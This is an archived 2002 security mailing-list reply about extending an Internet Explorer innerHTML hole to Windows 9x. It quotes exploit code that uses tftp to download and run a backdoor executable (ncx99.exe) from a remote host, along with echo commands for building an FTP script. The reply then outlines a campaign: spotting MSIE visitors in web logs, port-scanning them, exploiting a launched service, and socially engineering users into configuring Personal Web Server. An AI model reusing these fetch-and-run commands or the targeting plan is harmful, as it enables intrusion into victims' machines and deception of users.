Felipe Franciosi wrote... > > var programName=new Array( > > 'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe', > > 'c:/winnt/system32/ncx99.exe', > > ); > > MS Windows 9x don't have trivial ftp client by default... I was > thinking how this could be exploitable on these versions... > > The FTP client offers the option to read a text-file containing > line separated commands. > > But I couldn't get to work something like: > var prog... > 'c:/command.com /c echo bin > c:/list.txt', > 'c:/command.com /c echo GET something >> c:/list.txt' > > this won't create 'list.txt'... Any ideas why? Or how some could > get around it? On Win9x systems, rather than targeting FTP or a command shell, what about starting up something that simply causes a exploitable process to listen on some port # (will vary, depending on application) and then separately trying to exploit that. One could monitor one's web server access logs to notice when someone downloaded the first half of the exploit (the innerhtml hole). (Alternately, write a servlet/JSP/CGI script and you don't even need to monitor the log file.) If the User-Agent corresponds to MSIE, then at some time late (perhaps wait t minutes later), gently port scan the remote IP address to see if the application was launched. If the port scan succeeds, then go into full exploit mode. (This assumes an exploitable application that is normally not running and no pesky personal firewalls, etc. to be sure. But certainly some combinations would be vulnerable given the cluelessness of the typical Windoze users and their disdain for ever updating their system with security patches.) A bigger assumption is choosing an exploitable application that (preferably) launches without user intervention or requires any command line arguments. I don't know that much about Windoze apps, so all I have is one candidate application [see below.] (I do all my development for Solaris; I just have to use WinNT & LookOut! from work--sigh). However, the "Personal Web Server" that comes with Win98 (and perhaps other Windoze systems?) comes to mind as a possibility. The Personal Web Server is so full of holes that the executable name is probably 'swisscheese.exe'. I seem to recall doing a Win9x re-install for a friend where I think I was prompted as to whether I wanted to RUN it, but I don't remember it prompting if I wanted to load it. IIRC, that might mean that it was installed, but just not started, by default. (Or perhaps it's part of a commonly choosen package.) I never ran PWS, so I don't know if the Personal Web Server needs to be configured first to run or what. (If so, perhaps a bit of social engineering is in order. Tell people that a certain wizard dialog box is going to pop-up and and give them instructions how to configure it, making up some excuse as to why they should do this. Surely someone would fall for it.) The "good" thing about the Personal Web Server is that I believe that Microsoft's attitude with it with respect to security vulnerabilities has been pretty much to ignore them and to tell people to run IIS instead (since IIS is so much more secure ;-). Anyway, just my $.02 worth. BTW, just so you know, these are my personal opinions and in no way reflect the views of my company. --- Kevin W. Wall Qwest IT, Inc. / Security Infrastructure Dev Team Kevin.Wallat_private Phone: 614.932.5542 "Wipe Info uses hexadecimal values to wipe files. This provides more security than wiping with decimal values." -- Norton System Works 2002 manual, pg 160
This archive was generated by hypermail 2b30 : Thu Mar 14 2002 - 12:22:57 PST